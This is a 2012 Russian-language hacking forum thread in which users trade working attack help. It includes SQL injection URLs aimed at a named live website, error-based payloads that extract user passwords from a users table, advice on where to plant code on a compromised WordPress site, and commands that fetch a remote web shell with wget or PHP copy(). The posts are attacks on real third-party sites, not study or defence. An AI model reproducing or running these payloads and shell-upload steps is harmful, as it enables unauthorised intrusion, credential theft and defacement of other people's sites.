02.11.2012, 17:15
|
|
Новичок
Регистрация: 12.08.2012
Сообщений: 16
С нами:
7237046
Репутация:
0
|
|
Сообщение от BigBear
Для особо ленивых и не внимательных - маркирую
цветом
...
Извините плз, возможно ли реализовать эту инъекцию через wappex?
Если да, то объясните в 2х словах или подробно если не сложно.
Ещё раз извиняюсь за назойливость.
|
|
|
02.11.2012, 21:40
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от kingbeef
news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables
Так попробуй,а лучше выложи ссыль.
http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9
принтабльный парметр - 6
|
|
|
|
03.11.2012, 03:45
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от vaddd
http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9
принтабльный парметр - 6
http://www.artsnspirits.com/quick-signup.php?eventid=0+union+select+1,2,3,4,5,hex(ta ble_name),7,8,9+from+information_schema.tables+lim it+16,1--+
Дальше сам.
|
|
|
|
04.11.2012, 16:56
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Раскрутил, спасибо всем кто откликнулся.
|
|
|
|
04.11.2012, 17:16
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Subquery returns more than 1 row
В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются
|
|
|
|
04.11.2012, 17:31
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от vaddd
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Subquery returns more than 1 row
В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])and([/COLOR][COLOR="#0000BB"]select 1 from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"](([/COLOR][COLOR="#0000BB"]SELECT substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]user_password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from users limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables group by x[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"])--[/COLOR][/COLOR]
|
|
|
|
04.11.2012, 23:04
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от qaz
такой вопросец есть шелл, права не очень полные, движок ворд пресс, немогу редачить морду, зато могу редачить все остальные файлы а также файлы в папка wp-includes ] wp-admin ] script ] куда можно влепить свой код чтобы он отобразился на главной??? уже что не перепробывал ничего не выходит
Можно отредактировать шаблон
Можно в папке wp-includes полазить и посмотреть какие из них инклудятся на главную страницу, и отредактировать его
|
|
|
|
06.11.2012, 22:56
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')
|
|
|
|
06.11.2012, 23:06
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Sat-hacker
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')
воспользуйся пхп функцией copy();
пример:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://localhost/shell.txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"tmp/shell.php"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
06.11.2012, 23:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Sat-hacker
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')
слабо читать учебник по linux?
кури маны curl,wget,lynx, если система BSD то (fetch)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
